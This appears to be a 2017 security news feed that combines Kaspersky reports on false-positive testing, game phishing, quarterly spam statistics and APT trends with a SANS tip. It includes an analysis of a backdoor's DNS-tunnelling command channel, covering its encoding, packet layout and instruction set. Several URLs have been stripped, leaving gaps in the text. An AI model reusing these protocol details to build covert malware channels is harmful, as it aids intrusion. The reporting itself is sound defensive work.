The “farm” offers different combinations of operating systems and popular software. Before releasing each new non-signature-based detection method, we dynamically check it at this “farm” with standard and unique scenarios.

Last but not least, cybersecurity developers should also pay attention to test their web scanners for false positives. A website blocked by mistake can also disrupt the work of a customer, which is not acceptable.

To minimize the number of such incidents, we have developed automated systems to download up-to-date content daily from 10,000 of the most popular websites and scan this content to test for false positives. The most accurate results are achieved by using the most popular versions of common browsers and by using proxies in different geo locations to exclude location-dependent content.

Quality control of released detection methods

Detection methods that have been delivered to users are monitored day and night by the automated systems, which monitor the methods for any behavioral anomalies.

The thing is the dynamics of a detection that triggers a false positive often differs from the dynamics of a detection of a genuinely malicious file. Our genuine automated system monitors these anomalies, and if there is something suspicious, then the system will request an analyst to run an additional check for this detection. If suspicions are very strong, then our automated system turns off the detection method through KSN and immediately informs analysts about it. In addition, there are three teams of cybersecurity analysts on duty in Seattle, Beijing, and Moscow who work shifts around the clock to monitor the situation and quickly resolve emerging incidents. This is Humachine Intelligence in action.

In addition to detecting anomalies, the automated systems monitor performance data, errors in module operation, and potential problems based on diagnostic data received from users over KSN. This allows us to detect potential problems at early stages and eliminate them before their effect becomes noticeable for users.

In case the incident has occurred after all and cannot be closed by disabling an individual detection method, then urgent actions are taken to rectify the situation and allow the problem to be solved quickly and effectively. In this case, we may roll back the databases to a stable release that does not require any additional testing. To be honest, we have not resorted to this method in practice, as there has been no occasion for that thus far. In fact, we’ve only ever used it during our training exercises.

Speaking of training exercises…

Prevention is better than a cure

Not everything can be foreseen, and even if every eventuality were provided for, it would be good to know how certain measures would work in practice. Waiting for a real incident to happen isn’t necessary, as there is always the option of modeling.

Periodically, we conduct internal training exercises to confirm the “combat readiness” of our staff and the effectiveness of our methods for preventing false positives.

The training exercises are focused on full-blown imitation of diverse emergency scenarios in order to see if all of the systems and experts act according to plan. Several divisions of technical and service departments are simultaneously involved in the training exercises. These exercises are scheduled for a weekends and are based on a scrupulously thought-out scenario.

After training, we analyze each division for its performance, improve the documentation and implement changes for the involved systems and processes.

Sometimes during the training process, we discover new risks that had previously gone unnoticed. A more systematic discovery of those risks is achieved through brainstorming potential problems in the areas of technologies, processes and products. After all, technologies, processes, and products are constantly being developed, and any change brings about new risks.

Finally, we work systematically on eradicating root causes for all of the incidents, risks, and problems that were uncovered during our training exercises.

It goes without saying that all of the systems that are responsible for quality control are duplicated and are maintained day and night by the team of experts on duty. A fault in any one system will lead to transitioning over to a duplicate system while the fault itself is immediately addressed.


False positives cannot be avoided completely, but it is possible to lower their rate considerably to minimize their aftermath. This does require substantial investments, technological maturity, and resources from developers of cybersecurity solutions. Yet, these efforts provide a smooth experience for our users and corporate clients. These efforts are imperative and are within the scope of duties of each reliable developer.

Reliability is our creed. Instead of relying on one protection technology, we employ a multi-tier security approach. Protection against false positives is arranged in the same way – it is multi-tiered and duplicated multiple times. There is no other way since we are talking about the high-quality protection of our customers’ infrastructure.

At the same time, we succeed in finding and maintaining the optimal balance between the highest level of protection against cyberthreats and the the lowest level of false positives. This is confirmed by the results of independent tests in 2016:, a German test laboratory, gave Kaspersky Endpoint Security eight awards at the same time, including Best Protection 2016 and Best Usability 2016.

In conclusion, I would like to note that high quality is not a result that ought to be achieved only once. This is a process that requires constant supervision and improvement, especially where the price of a possible mistake means the disruption of a customer’s business processes.

CEO Fraud

SANS Tip of the Day - Fri, 05/05/2017 - 01:00
CEO Fraud is a type of targeted attack. It commonly involves a cyber criminally pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

Clash of Greed

Malware Alerts - Thu, 05/04/2017 - 04:57

In 2015, the game Clash of Clans was bringing in about 1.5 million dollars per day for its developer, Supercell. Later on, the company launched a new project, Clash Royale, after addressing the flaws of their first game and implementing battles with real players into the new game, which shares the same characters and the same cartoonish design as the first project. Yet, the more popular game is, the higher the probability that fraudsters will be looking to make a fortune on that popularity by, for example, organizing phishing attacks on the player base.

The money-making model for both of the games has been thoroughly thought-out: anyone can play without investing real money. But this would mean putting a lot of effort into the games and losing more often to other players who basically purchase and upgrade either rare and strong cards with extremely low drop rates or battle units and building levels (when talking about Clash of Clans). In this regard, the majority of the game’s players do not have much money but are full of ambition. These players often seek not-so-legal ways to procure and upgrade rare cards to put less effort into winning battles and ranking up to play in the premier leagues.

This has been exploited by fraudsters, who subtly abuse human foibles such as cupidity, love for freebies, and the desire to be the top player. Phishing attacks, though always quite similar in their nature, are very competently planned. Phishing websites are designed with holidays in mind (either New Year’s Eve or Christmas) or are linked to game updates that include additions to the game or changes in the game’s mechanics (new cards, units, balancing, etc.).

Here, for example, is the headline of a phishing website targeted at Clash of Clans players. It was designed specially for New Year’s Eve, and, according to the published description, the developer of the game supposedly gives out New Year’s gifts to players, including game currency, building level upgrades, etc.

The address of the website contains the phrase “eventchristmasandnewyear”, which makes the website look even more credible.

Victims can choose what they want from a list that includes gold, crystals, resources, and building upgrades.

The intention of the fraudsters becomes obvious as early as at the next step, where victims are prompted fill out a form by entering the credentials of their Google and Facebook accounts. After that, these credentials are passed on to the fraudster and the victims are robbed of both of their accounts.

The form created by the fraudsters offers “authorization” with Google and Facebook credentials

Also, fraudsters reacted quickly to the release of the latest updates, which included new battle arenas and legendary cards. On behalf of Supercell, players were offered their choice of one of the “legendaries”, as well as gold and crystals. Of course, in order to obtain these, Google and Facebook credentials were required.

One of their recent releases was “a gift from the developers”, which gives the player the option of selecting their desired hero or resources

Input fields for credentials

After sending the credentials, the victim receives a message to confirm their registration. It can be assumed that the evildoers may need this to ascertain the authenticity of the user-specified credentials.

To avoid falling victim to this fraudulent scheme, it is a good idea to follow these simple rules: do not use any links from social network groups, especially if the groups are not official, or from e-mail messages received from unknown users, even though they may promise you progress in the game or imminent profit. It certainly couldn’t hurt to install good security software that features anti-phishing functionality with database updates on malicious and phishing links that cover every subject. If the “free lunch” being offered proves to be too tempting, then go to the game developer’s official website and verify whether the holiday offer is genuine.

Spam and phishing in Q1 2017

Malware Alerts - Tue, 05/02/2017 - 04:57

Spam: quarterly highlights Spam from the Necurs botnet

We wrote earlier about a sharp increase in the amount of spam with malicious attachments, mainly Trojan encryptors. Most of that spam was coming from the Necurs botnet, which is currently considered the world’s largest spam botnet. However, in late December 2016, the network’s activity almost ceased completely and, as time showed, it wasn’t just a break for the festive season. The volume of spam sent from this botnet remained at an extremely low level for almost the entire first quarter of 2017.

In Q1 2017, the percentage of spam in email traffic amounted to 55.9%.


Why has Necurs stopped distributing spam? We know that the botnet is active and the bots are waiting for commands. Perhaps the criminals behind the botnet got scared by all the fuss made about encryptors and decided to temporarily suspend their mass mailings.

We still continue to register malicious mass mailings from what is presumably the Necurs botnet, though their volume is a fraction of the amount recorded in December:

The number of malicious messages caught by our traps that were presumably sent by the Necurs botnet

As before, the emails usually imitate various types of bills and other official documents:

The email above contained an attached MSWord document with macros that downloaded the Rack family encryptor (detected as Trojan.NSIS.Sod.jov) to the victim machine.

In addition to malicious mailings from the botnet, we came across a mass mailing about pump-and-dump stock schemes:

As a rule, mass mailings exploiting this subject are distributed in huge volumes over a very short period of time. This is because the fraudsters have to pump and dump shares quickly, before their scams are discovered on the stock exchange. This type of stock fraud is against the law, so cybercriminals try to wind up the affair within a couple of days. The Necurs botnet is ideal for this sort of scam due to its size – according to estimates, it currently exceeds 200,000 bots.

The average share of spam in Russia’s email traffic in Q1 2017 was 61.6%.


Does this sharp drop mean we have reached peak crypto-spam mass mailing and it’s about to disappear? Unfortunately, no.

The total volume of malware detected in email decreased, but not that dramatically – 2.4 times less than the previous quarter.

The number of email antivirus detections, Q4 2016 vs Q1 2017

Malicious mass mailings are still being sent out and, although their volume has decreased, cybercriminals are using a variety of techniques to deceive both security solutions and users.

Malicious emails with password-protected archives

In the first quarter we observed a trend towards packing malware into password-protected archives to complicate detection of malicious emails.

All the classic tricks were used to make potential victims open the archives: fake notifications about orders from large stores, various bills, money transfers, resumes, or the promise of lots of money.

The attached archives usually contained office documents with macros or JavaScript scripts. When launched, the files downloaded other malicious programs on the user’s computer. Interestingly, after the decline in Necurs botnet activity, the harmful “payload” that spread via spam became much more diverse. The cybercriminals sent out ransomware and spyware, backdoors and a new modification of the infamous Zeus Trojan.

The attachments above contain Microsoft Word documents with macros that download several different modifications of a Trojan encryptor belonging to the Cerber family from onion domains in different zones. This malicious program selectively encrypts data on the user’s computer and demands a ransom for decrypting it via a site on the Tor network.

The archive in the message above contains the Richard-CV.doc file with macros that downloads representatives of the Fareit spyware family from the domain. These malicious programs collect confidential information about the user and send it to the remote server.

There was yet another case involving downloadable spyware, this time from the Pinch family. The Trojan collects passwords, email addresses, information about the system configuration and registry settings. Among other things, it harvests information from instant messaging services and mail clients. The obtained data is encrypted and sent to the criminals by email. According to our information received from KSN, the program is most widespread in Russia, India and Iran.

Most email antivirus detections occurred in China – 18% of all spam.


It’s worth pointing out that this spyware was spread using fake business correspondence. Emails were sent out using the names of real small and medium businesses with all the relevant signatures and contacts, rather than using the name of some made-up organization.

Unlike other emails, the example above does not contain a password-protected archive. The request to enter a password is just a trick: the fraudsters want the user to enable Microsoft Word macros to run the malicious script.

The contents of the email above include a password-protected document with a script in Visual Basic that downloads the Andromeda bot on the victim machine. The latter establishes a connection with the command center and waits for commands from the owners. It has broad functionality and can download other malicious programs on the user’s computer.

This fake notification from an e-store contains a malicious script. On entering the password and launching the malicious content, the Receipt_320124.lnk file is created in the %TEMP% catalogue. It, in turn, downloads a Trojan-banker of the Sphinx family, which is a modification of the older and infamous Zeus, on the victim computer.

As we can see, very different mass mailings with malicious attachments now contain files packed in a password-protected archive. Most likely, this trend will continue: a password-protected document is likely to appear more trustworthy to the user, while causing problems for security solutions.

Spam via legal services

Modern virtual platforms for communication (messengers, social networks) are also actively used by spammers to spread advertising and fraudulent offers. Cybercriminals register special accounts for spamming in social networks and to make their messages look more authentic they use techniques similar to those used in traditional mass mailings (for example, the personal data from the account and that sent in the email are the same). The same type of spam, for example, ‘Nigerian letters’, offering earnings, etc. can be distributed via email traffic and social networks. A notification about a message is usually sent to the recipient’s email address; in this case, the technical header of the email is legitimate, and it is only possible to detect the spam by the contents of the message. Spam distributed directly via email, can be easily detected by technical headers. The same cannot be said for messages sent via legitimate services, especially if the address of the service is added to the user’s list of trusted addresses.

Today’s email spam filters can cope effectively with the task of detecting spam that is sent in the traditional way, so spammers are forced to look for new methods to bypass filters.

Holidays and spam

The first quarter of 2017 saw festive spam dedicated to New Year, St. Patrick’s Day, Easter and Valentine’s Day. Small and medium-sized businesses advertised their services and products and offered holiday discounts. Offers from Chinese factories were timed to coincide with the Chinese New Year, which was celebrated in mid-February.

Spammers also sent out numerous offers to participate in a survey and get coupons or gift cards from major online stores, hoping to collect the recipients’ personal information and contact details.

Burst of B2B spam

In the first three months of 2017, we also recorded a large number of mass mailings containing offers to buy company databases from specific industries. This type of spam remains popular with spammers and primarily targets companies or individual representatives of large businesses rather than ordinary users. Therefore, these messages are sent mainly to people or companies from a list of contacts or addresses for a particular business segment that is obtained, as a rule, in the same way – via spam.

The offers are sent on behalf of firms or their representatives, but they are often completely impersonal.

Spammers have databases of companies for any business segment, as well as the contact details of participants at major exhibitions, seminars, forums and other events. To make recipients interested in their offers, spammers often send several free contacts from their collections.

Statistics Proportion of spam in email traffic

Percentage of spam in global email traffic, Q4 2016 and Q1 2017

Compared to Q4 2016, there was a decline in the overall proportion of spam in global email traffic in the first three months of 2017. In January, the proportion fell to 55.05%, while in February the share was even lower – 53.4%. However, in March the level of spam showed an upward trend, rising to 56.9%. As a result, the average share of spam in global email traffic for the first quarter of 2017 was 55.9%.

Percentage of spam in Russia’s email traffic, Q4 2016 and Q1 2017

The spam situation in the Russian segment of the Internet was somewhat different from the global one. In January 2017, the proportion of junk email increased to almost 63% and stayed in the 60-63% range until the end of the quarter. In February, as was the case with overall global traffic, there was a decline – to 60.35% – followed by an increase to 61.65% in March. The average share of spam in Russian email traffic in the first quarter of 2017 was 61.66%.

Sources of spam by country

Sources of spam by country, Q1 2017

In the first quarter of 2017, the US remained the leading source of spam – its share accounted for 18.75%. Representatives from the Asia-Pacific region – Vietnam (7.86%) and China (7.77%) – came second and third.

Trojan-Downloader.JS.Agent remained the most popular malware family spread via email.


Germany was the fourth biggest source, responsible for 5.37% of world spam, followed by India (5.16%). Russia, in sixth place, accounted for 4.93% of total spam.

The top 10 biggest sources also included France (4.41%), Brazil (3.44%), Poland (1.90%) and the Netherlands (1.85%).

Spam email size

Breakdown of spam emails by size, Q4 2016 and Q1 2017

In Q1 2017, the share of small emails (up to 2 KB) in spam traffic decreased considerably and averaged 29.17%, which is 12.93 p.p. less than in the fourth quarter of 2016. The proportion of emails sized 2–5 KB (3.74%) and 5–10 KB (7.83%) also continued to decline.

Meanwhile, the proportion of emails sized 10-20 KB (25.61%) and 20-50 KB (28.04%) increased. Last year’s trend of fewer super-short spam emails and more average-sized emails has continued into 2017.

Malicious attachments in email Top 10 malware families

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

TOP 10 malware families in Q1 2017

The Backdoor.Java.Adwind family (2.36%) in fifth place is a cross-platform multifunctional backdoor written in Java and sold on DarkNet as malware-as-a-service (MaaS). It is also known under the names of AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is typically distributed via email as a JAR attachment.

A newcomer – Trojan-Downloader.MSWord.Cryptoload (1.27%) – occupied ninth place. It’s a JS script containing malware, which it installs and runs on the computer.

Trojan-Downloader.VBS.Agent (1.26%) rounded off the Top 10.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q1 2017

In Q1 2017, China (18.23%) was the country targeted most by malicious mailshots. Germany, last year’s leader, came second (11.86%), followed by the UK (8.16%) in third.

Italy (7.87%), Brazil (6.04%) and Japan (4.04%) came next, with Russia occupying seventh place with a share of 3.93%. The US was in ninth place with (2.46%), while Vietnam (1.94%) completed the Top 10.


In the first quarter of 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. Overall, 9.31% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q1 2017.

Geography of attacks

China (20.88%) remained the country where the largest percentage of users is affected by phishing attacks, although its share decreased by 1.67 p.p.

Geography of phishing attacks*, Q1 2017

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 0.8 p.p. and amounted to 19.16%, placing the country second in this ranking. Macao added 0.91 p.p. to the previous quarter’s figure and came third with 11.94%. Russia came fourth with 11.29% (+0.73 p.p.), followed by and Australia on 10.73% (-0.37p.p).

TOP 10 countries by percentage of users attacked

Country % China 20.87% Brazil 19.16% Macao 11.94% Russia 11.29% Australia 10.73% Argentina 10.42% New Zealand 10.18% Qatar 9.87% Kazakhstan 9.61% Taiwan 9.27%

Argentina (10.42%, +1.78 p.p.), New Zealand (10.18%), Qatar (9.87%), Kazakhstan (9.61%) and Taiwan (9.27%) completed the top 10.

Organizations under attack Rating the categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2017, the ‘Banks’ (25.82%, -0.53 p.p.), ‘Payment systems’ (13.6%, +2.23 p.p.) and ‘Online stores’ (10.89%, +0.48 p.p.) categories accounted for more than half of all registered attacks. The total share of ‘Financial organizations’ was a little over 50% of all phishing attack

Distribution of organizations affected by phishing attacks by category, Q1 2017

In addition to financial organizations, phishers most often targeted ‘Global Internet portals’ (19.1%), although their share decreased by 5.25 p.p. from the previous quarter. ‘Social networking sites’ (9.56%) and ‘Telecommunication companies’ (5.93%) also saw their shares fall by 0.32 p.p. and 0.83 p.p. respectively. The percentage of the ‘Online games’ category accounted for 1.65% while the figure for ‘Instant messaging’ was 1.53%.

TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component are for phishing pages using the names of fewer than 15 companies.

In Q1 2017, Kaspersky Lab products blocked 51 million attempts to open a phishing page.


The TOP 3 organizations attacked most frequently by phishers remained unchanged for the second quarter in a row. Yahoo! was once again the organization whose brand was mentioned most often on phishing pages (7.57%, – 1.16 p.p.). Facebook (7.24%), whose share fell by 0.13 p.p., was second, while Microsoft (5.39%, -0.83 p.p.) came third.

Organization % of detected phishing links Yahoo! 7.57 Facebook 7.24 Microsoft Corporation 5.39

In order to reach the widest possible audience with one attack, scammers often mention a variety of brands expecting the victims to react to at least one of them. This is facilitated by authentication with existing accounts, which many Internet services use trying to make life easier for their users. Therefore, a page offering to use different accounts to enter a site does not arouse suspicions. This allows fraudsters to steal user data from several different resources using just one phishing page.

Phishing page prompting the user to login via the accounts of other web resources to access a file

This phishing page uses a similar trick under the pretext of accessing the Google Drive service

Hot topics this quarter Payment systems

In the first quarter Q1 2017, 13.6% of detections of Kaspersky Lab’s heuristic anti-phishing component fell under the ‘Payment Systems’ category. It means that every eighth attack targeted this category, which has been popular with phishers for several quarters now.

PayPal (28.25%) came first on the list of attacked payment systems, followed by Visa (25.78%) and American Express (24.38%).

Organization %* PayPal 28.25 Visa Inc. 25.78 American Express 24.38 MasterCard International 16.66 Others 4.94

* The percentage of attacks on an organization as a total of all attacks on organizations from the ‘Payment Systems’ category

The goal of phishers attacking customers of popular payment systems is to get personal and payment data, login details for accounts, etc. Criminals often place fraudulent content on reputable resources in order to gain the trust of the user and bypass blacklisting. For example, we came across a fake PayPal support page located on the Google Sites service (the primary domain is After clicking on the banner, the user is redirected to a phishing page, where they are asked to enter their account data for the payment system.

Phishing page using the PayPal brand located on the Google domain

Another trick used by phishers is to place phishing content on the servers of government agencies. This is possible because a significant number of government agencies do not pay much attention to the security of their web resources.

Phishing page using the PayPal brand located on a server belonging to Sri Lankan government

Phishing page using the PayPal brand located on a server belonging to the Bangladesh government

Emails threatening to block an account or asking to update data in a payment system were used as bait.

Online stores

Every tenth phishing attack targeted users of online stores. In Q1 2017, Amazon (39.13%) was the most popular brand with phishers.

Organization % Online Shopping 39.13 Apple 15.43 Steam 6.5 eBay 5.15 Alibaba Group 2.87 Taobao 2.54 Other targets 28.38

By using the Amazon brand, cybercriminals are trying not only to steal login data but also all the personal information of the user, including their bank card details. Also, they often place fake pages on domains that have a good reputation (for example, on a domain owned by Vodafone).

Phishing page using the Amazon brand located on the Vodafone domain

Earning money with anti-phishing

In addition to standard phishing emails and pages, we often come across other methods of tricking users. Scammers often exploit people’s desire to make easy money by offering cash to view advertising, automatic stock trading programs and much more.

Spam emails offering quick money on the Internet

In the first quarter of 2017, we saw a rather interesting fraudulent resource which claimed to be combating phishing sites. All you had to do if you wanted to make some quick cash was to register and perform several tasks, the essence of which was to evaluate web pages using the following options: malicious, safe, does not load. Only the content of the page was evaluated, while its address was not displayed.

After checking 31 sites, it turned out that $7 needed to be paid to withdraw the money that was earned

For each ‘checked’ site, the user earned about $3. To withdraw that money, they had to transfer $7 to the owners of the resource as confirmation that they were an adult and financially solvent. Of course, no ‘earnings’ were ever received after that.


Although the beginning of Q1 2017 was marked by a decline in the amount of spam in overall global email traffic, in March the situation became more stable, and the average share of spam for the quarter amounted to 55.9%. The US (18.75%) remained the biggest source of spam, followed by Vietnam (7.86%) and China (7.77%).

The first quarter of 2017 was also notable for the decrease in the volume of malicious spam sent from the Necurs botnet: the number of such mass mailings decreased significantly compared to the previous reporting period. However, the lull may be temporary: the attackers may have decided to suspend mass mailings until all the hype about encryptors subsides.

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families detected in email. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

In Q1 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. China (20.88%) topped the rating of countries most often attacked by phishers. Financial organizations remained the main target for phishers, and we expect this trend to continue in the future.

Use of DNS Tunneling for C&C Communications

Malware Alerts - Fri, 04/28/2017 - 05:59

Say my name.!

You are goddamn right.

Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we omit these two and have a look at the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or switches mouse buttons.

Malware has come a long way since the Morris worm, and the authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take weeks or even months for analysists to decipher. Others go back to the basics and use IRC servers as a management host – as we saw in the recent case of Mirai and its numerous clones.

Often, virus writers don’t even bother to run encryption or mask their communications: instructions and related information is sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of incompetent cybercriminals or even experienced programmers who don’t have much experience developing malware.

However, you do get the occasional off-the-wall approaches that don’t fall into either of the above categories. Take, for instance, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with the C&C server.

The malicious program in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan enables an intruder to manipulate the file system, run arbitrary commands and run loadable modules.


Just like lots of other Trojans before it, Backdoor.Win32.Denis extracts the addresses of the functions it needs to operate from loaded DLLs. However, instead of calculating the checksums of the names in the export table (which is what normally happens), this Trojan simply compares the names of the API calls against a list. The list of API names is encrypted by subtracting 128 from each symbol of the function name.

It should be noted that the bot uses two versions of encryption: for API call names and the strings required for it to operate, it does the subtraction from every byte; for DLLs, it subtracts from every other byte. To load DLLs using their names, LoadLibraryW is used, meaning wide strings are required.

‘Decrypting’ strings in the Trojan

Names of API functions and libraries in encrypted format

It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to extracted functions alternate with references to functions received from the loader.

C&C Communication

The principle behind a DNS tunnel’s operation can be summed up as: “If you don’t know, ask somebody else”. When a DNS server receives a DNS request with an address to be resolved, the server starts looking for it in its database. If the record isn’t found, the server sends a request to the domain stated in the database.

Let’s see how this works when a request arrives with the URL to be resolved. The DNS server receives this request and first attempts to find the domain extension ‘.com’, then ‘’, but then it fails to find ‘’ in its database. It then forwards the request to and asks it if such a name is known to it. In response, is expected to return the appropriate IP; however, it can return an arbitrary string, including C&C instructions.

Dump of Backdoor.Win32.Denis traffic

This is what Backdoor.Win32.Denis does. The DNS request is sent first to, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.

Here is the response:

DNS packet received in response to the first request

Obviously, the request sent to the C&C is encrypted with Base64. The original request is a sequence of zeros and the result of GetTickCount at the end. The bot subsequently receives its unique ID and uses it for identification at the start of the packet.

The instruction number is sent in the fifth DWORD, if we count from the start of the section highlighted green in the diagram above. Next comes the size of the data received from C&C. The data, packed using zlib, begins immediately after that.

The unpacked C&C response

The first four bytes are the data size. All that comes next is the data, which may vary depending on the type of instruction. In this case, it’s the unique ID of the bot, as mentioned earlier. We should point out that the data in the packet is in big-endian format.

The bot ID (highlighted) is stated at the beginning of each request sent to the C&C

C&C Instructions

Altogether, there are 16 instructions the Trojan can handle, although the number of the last instruction is 20. Most of the instructions concern interaction with the file system of the attacked computer. Also, there are capabilities to gain info about open windows, call an arbitrary API or obtain brief info about the system. Let us look into the last of these in more detail, as this instruction is executed first.

Complete list of C&C instructions

Information about the infected computer, sent to the C&C

As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the info stored in the registry branch Software\INSUFFICIENT\INSUFFICIENT.INI:

  • Time when that specific instruction was last executed. (If executed for the first time, ‘GetSystemTimeAsFileTime’ is returned, and the variable BounceTime is set, in which the result is written);
  • UsageCount from the same registry branch.

Information about the operating system and the environment is also sent. This info is obtained with the help of NetWkstaGetInfo.

The data is packed using zlib.

The DNS response prior to Base64 encryption

The fields in the response are as follows (only the section highlighted in red with data and size varies depending on the instruction):

  • Bot ID;
  • Size of the previous C&C response;
  • The third DWORD in the C&C response;
  • Always equals 1 for a response;
  • GetTickCount();
  • Size of data after the specified field;
  • Size of response;
  • Actual response.

After the registration stage is complete, the Trojan begins to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a series of empty queries and responses.

Sequence of empty queries sent to the C&C


The use of a DNS tunneling for communication, as used by Backdoor.Win32.Denis, is a very rare occurrence, albeit not unique. A similar technique was previously used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this use of the DNS protocol is new on PCs. We presume this method is likely to become increasingly popular with malware writers. We’ll keep an eye on how this method is implemented in malicious programs in future.



APT Trends report, Q1 2017

Malware Alerts - Thu, 04/27/2017 - 04:58

Kaspersky Lab is currently tracking more than a hundred threat actors and sophisticated malicious operations targeting commercial and government organizations in over 80 countries. During the first quarter of 2017, there were 33 private reports released to subscribers of our Intelligence Services, with Indicators of Compromise (IOC) data and YARA rules to assist in forensics and malware-hunting.

We continue to observe a sharp rise in the sophistication of attacks with nation-state backing and a merger of tactics, techniques, and procedures (TTPs) between APT actors and financially motivated cybercriminals. We have witnessed the Middle East becoming one of the major cyber battlefields. At the same time, during Q1 2017, the discovery of a new Wiper victim in Europe raised eyebrows and suggested that these kinds of destructive attacks have now spread beyond the Middle East.

In this report, we discuss the targeted attack highlights from the first quarter of 2017, and discuss some emerging trends that demand immediate attention.

Highlights in targeted attacks Evolution of Wipers: a new weapon for APT actors

During the last few months a new wave of wiper attacks, mainly focused against Saudi interests, raised a red flag for many companies, and for a good reason. The new wave of Shamoon attacks apparently relied on stolen credentials from Active Directory for their internal distribution stage. The investigation of these attacks lead us to the discovery of a new wiper we called StoneDrill.

We believe both Shamoon and StoneDrill groups are aligned in their interests, but are two separate actors, which might also indicate two different groups working together.

Our technical analysis of StoneDrill lead to the discovery of old samples (2014) in our collection that share their base code with the new StoneDrill samples. Interestingly, these old samples were attributed to the NewsBeef (Charming Kitten) group. The similarities between samples include sharing the same credentials (username and password) for C2 communications, which establish a very strong link between them.

Figure 1. Credentials used for C2 communication both in StoneDrill and NewsBeef samples

We believe that StoneDrill might be a more recent version of NewsBeef artifacts, effectively relating the known APT actor with this new wave of wiper attacks.

In addition, and related to the Shamoon attacks, we have collected different artifacts that might have been used by the actor during the first stages of attack. This first stage is critical, as credentials need to be stolen for the subsequent distribution of the malware at the victim’s premises.

Ismdoor is a backdoor found to be related to the Shamoon attacks, and might serve well for the attackers’ purposes. This tool was found mainly in Saudi Arabia and belongs to the oil and energy industry. The analysis revealed very interesting details about additional tools used by the attackers for lateral movement, which were mainly based in Powershell-based exploitation frameworks, following the trend of using fileless generic malware explained later in this report.

Finally, it is remarkable that we have detected the first victim of StoneDrill in Europe. The victim belongs to the energy industry, something which might be an indicator that this actor is spreading out of the Middle East. After attributing this wiper with what we believe might be a government-sponsored actor, this fact is highly worrying, as it might indicate a geopolitically-motivated spread of cyber-sabotage operations. This last assumption is yet to be confirmed.


  • Wipers are now extending their geography

  • Wipers are now a part of the arsenal of APT groups. They can be used in destructive operations, as well as for deleting traces after a cyberespionage operation.

  • One of the modules used in the last Shamoon wave of attacks had ransomware capabilities, which might be considered another form of not-so-obvious wiping.

  • The fact that these destructive operations against energy companies might be related to some government sponsored APT actors is definitely worrying, and surpasses typical espionage operations.

BlueNoroff/Lazarus: bank robbery, evolved

A massive waterhole attack targeting Polish banks was publicly disclosed on 3 February, 2017. The attack leveraged the webserver of a Polish financial sector regulatory body, the Polish Financial Supervision Authority (, which was hacked and used to redirect users to an exploit kit. A very similar technique was used against the Mexican financial authority at the same time, and even if no other victims of this group were made public, it is very likely that more banks were also similarly affected.

Our analysis linked the attack with the BlueNoroff/Lazarus group, which has been responsible for multiple other bank attacks, including the famous Bangladesh bank heist. This waterhole attack revealed, for the first time, one of the strategies used by BlueNoroff for gaining a foothold in its target organizations. Although the attack didn’t use any zero days, the Flash Player and Silverlight exploit appeared to be enough to compromise a large number of banks, which were running on outdated software.

Indeed, we started tracking the BlueNoroff actor a long time ago. We originally saw this actor trying to infect banks in the South-East Asian region. BlueNoroff has developed a characteristic set of tools for lateral movement inside targeted organizations, and in several cases attempted tampering with SWIFT software for cashing out. This technique showed its enormous potential with the Bangladesh central bank heists, where attackers attempted to steal more than 900 million USD. In the February “Polish case”, we saw the group reusing these known lateral movements tools repackaged for their new wave of victims. This provided us with a high degree of confidence in attributing the attack to this actor.

Interestingly, the BlueNoroff group planted Russian words within the code, to derail investigators and avoid attribution. The code contained grammar errors a native Russian speaker wouldn’t make, and sentences were likely translated using online tools.


  • We believe BlueNoroff is one of the most active groups in terms of attacks against financial institutions and is trying to actively infect different victims in several regions.
  • We think their operations are still ongoing, and in fact, their most recent malware samples were found in March 2017.
  • At the moment we believe BlueNoroff is probably the most serious threat against banks.
Fileless malware: enough for the job with no attribution

Avoiding attribution is one of the key goals for many APT actors, especially since a large number of operations have been exposed in recent last years. For the most sophisticated groups, the problem is that they already have their well established procedures, specially crafted tools and training, that do not always allow them to stay unnoticed.

But that is not the case for the not-so-big actors or cybercriminals. Rather than creating and having their own tools, these use generic tools that are good enough to complete an operation, and provide an evident economic advantage, with the added value of making both analysis of the incident and attribution to a particular actor more difficult.

Nowadays there is a large number of different frameworks providing cyber-actors with many options, especially for lateral movement. This category includes Nishang, Empire, Powercat, Meterpreter, etc. Interestingly, most of these are based on Powershell, and allow the use of fileless backdoors.

